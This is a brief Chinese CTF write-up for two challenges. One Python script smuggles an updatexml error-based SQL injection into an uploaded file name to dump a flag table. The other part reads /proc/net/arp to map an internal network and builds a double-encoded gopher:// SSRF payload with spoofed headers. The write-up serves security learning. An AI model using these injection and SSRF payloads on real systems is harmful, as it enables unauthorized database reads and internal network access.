upload
updatexml报错注入
import requests
url = "http://124.222.24.150:8001/index.php"
sql = "1' and updatexml(0x7e,concat(0x7e,(select flag from flag)),0x7e)or'"
#sql = "1' and updatexml(0x7e,concat(0x7e,(select substr(flag,20,20) from flag)),0x7e)or'"
file = {
"upfile":("2."+sql,"<php>","ctf")
}
req = requests.post(url,files=file)
print(req.text)
signin
先读下hosts,看下内网地址
查看下这个网段存在ip,可以查看/proc/net/arp,也可以遍历一下。
提示我们先get一个a,我们可以按照它的提示一个一个构造包,用gopher协议传参。
(如果用gopher传post要把换行替换为%0d%0a,如果多个参数,参数之间的&也需要进行URL编码)
import urllib.parse
payload =\
"""POST /index.php?a=1 HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Referer: bolean.club
Content-Length: 3
b=1
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://172.73.23.100:80/'+'_'+new
result = urllib.parse.quote(result)
print(result) # 这里因为是GET请求所以要进行两次url编码
拿到flag